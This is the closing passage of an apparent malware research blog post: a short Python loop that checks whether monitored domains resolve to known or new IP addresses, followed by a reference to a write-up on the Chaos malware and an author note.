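for domain, known_ips in DOMAINS.items():  # current vs. known resolutions
    try:
        ip = socket.gethostbyname(domain)
        print(f"{domain} -> {ip} ({'known' if ip in known_ips else 'NEW'} IP)")
    except socket.gaierror:
        print(f"{domain} does not currently resolve")
```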

References

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

About the author
Nathaniel Bill
Malware Research Engineer